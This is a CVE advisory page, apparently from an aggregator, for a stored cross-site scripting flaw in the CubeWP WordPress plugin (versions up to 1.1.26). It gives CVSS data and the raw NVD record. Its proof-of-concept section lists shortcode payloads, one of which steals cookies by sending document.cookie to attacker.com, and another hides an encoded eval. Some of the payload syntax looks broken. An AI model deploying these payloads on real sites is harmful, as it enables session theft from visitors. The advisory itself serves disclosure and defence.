Security Vulnerability Report
中文
CVE-2025-8615 CVSS 6.4 MEDIUM

CVE-2025-8615

Published: 2026-01-17 09:15:52
Last Modified: 2026-04-15 00:35:42

Description

The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeWP Framework插件 <= 1.1.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CubeWP存储型XSS PoC - 需 Contributor 权限 --> <!-- 在文章/页面中插入以下短代码 --> [cubewp_shortcode_taxonomy taxonomy='" onerror="alert(String.fromCharCode(88,83,83))" data-x="'] <!-- 或利用事件处理器 --> [cubewp_shortcode_taxonomy taxonomy='test"><script>document.location='https://attacker.com/steal?c='+document.cookie</script>'] <!-- 更隐蔽的利用方式 --> [cubewp_shortcode_taxonomy taxonomy='test' style='x:expression(eval(atob('YWxlcnQoJ1hTUycpOw==')))']

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8615", "sourceIdentifier": "[email protected]", "published": "2026-01-17T09:15:51.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CubeWP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cubewp_shortcode_taxonomy shortcode in all versions up to, and including, 1.1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin CubeWP para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del shortcode cubewp_shortcode_taxonomy del plugin en todas las versiones hasta la 1.1.26, inclusive, debido a la sanitización insuficiente de las entradas y al escape de las salidas en los atributos proporcionados por el usuario. Esto permite a atacantes autenticados, con acceso de nivel de colaborador y superior, inyectar scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3362001#file10", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/cubewp-framework/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/efc2baf0-38d9-44be-b439-3585b2f1d4a5?source=cve", "source": "[email protected]"}]}}